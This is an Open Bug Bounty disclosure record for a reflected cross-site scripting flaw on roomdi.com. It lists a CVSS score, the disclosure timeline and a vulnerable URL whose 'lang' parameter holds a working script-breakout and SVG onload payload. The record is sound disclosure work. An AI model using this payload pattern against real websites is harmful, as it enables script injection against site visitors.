roomdi.com XSS vulnerability

2017-12-01T10:33:00
ID OBB:446114
Type openbugbounty
Reporter Random_Robbie
Modified 2018-03-01T10:33:00

Description

Open Bug Bounty ID: OBB-446114

Description| Value
---|---
Affected Website:| roomdi.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.roomdi.com/hotel/?lang=en%22%27--!%3E%3C/script/%3E%3CSvg/OnLoad=confirm`OPENBUGBOUNTY`%20//✓_in=11/12/2017&option;=16&hotel;=205026&utm;_source=tripadvisor&client;=tripadvisor&utm;_medium=search&rooms;=30,30&nswid;=apdQT4jaFOiw7PxnGcFPcB2XvbVDmkPkw6FL/mpzQ2kP91NFCgx8eWnrhuHBJ7bvBxBBPtbdZJP4tb60LyZM7FC4c9KEyV08b8z+o0l//sHoam9KHVwsq82+JvexJTzLTwNf9JYLNxvG7O3keoKt+Cc7ZjuWpabkAg+LIRrL5S+kya6vNsxVqjiDVYqPgq3pdLSxeLb2hfvdKsnPPbDte3GHtje40TI9+ILfat2v4DRcodQLCXFOpwxgI1itde9XMv44H5ho0sJvnllWE82JX/IX/aUVMIjU94vd2Tglk5me2oQyr6jCD5JTglAiq51TE1YjcVMAJ4nhKuOkxFgPB2hQJ5jgAFbmbCsSqZcunON4xUVmNBZyteQCYwAVCW1E&sid;=929fad6c-eb39-409d-aec0-a0c14ed2a324✓_out=12/12/2017&market;=uk#stay
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 1 December, 2017 10:33 GMT
Vulnerability Verified:| 4 December, 2017 06:03 GMT
Website Operator Notified:| 4 December, 2017 06:03 GMT
Vulnerability Published:| 4 December, 2017 06:03 GMT[without any technical details]
Public Disclosure:| 1 March, 2018 10:33 GMT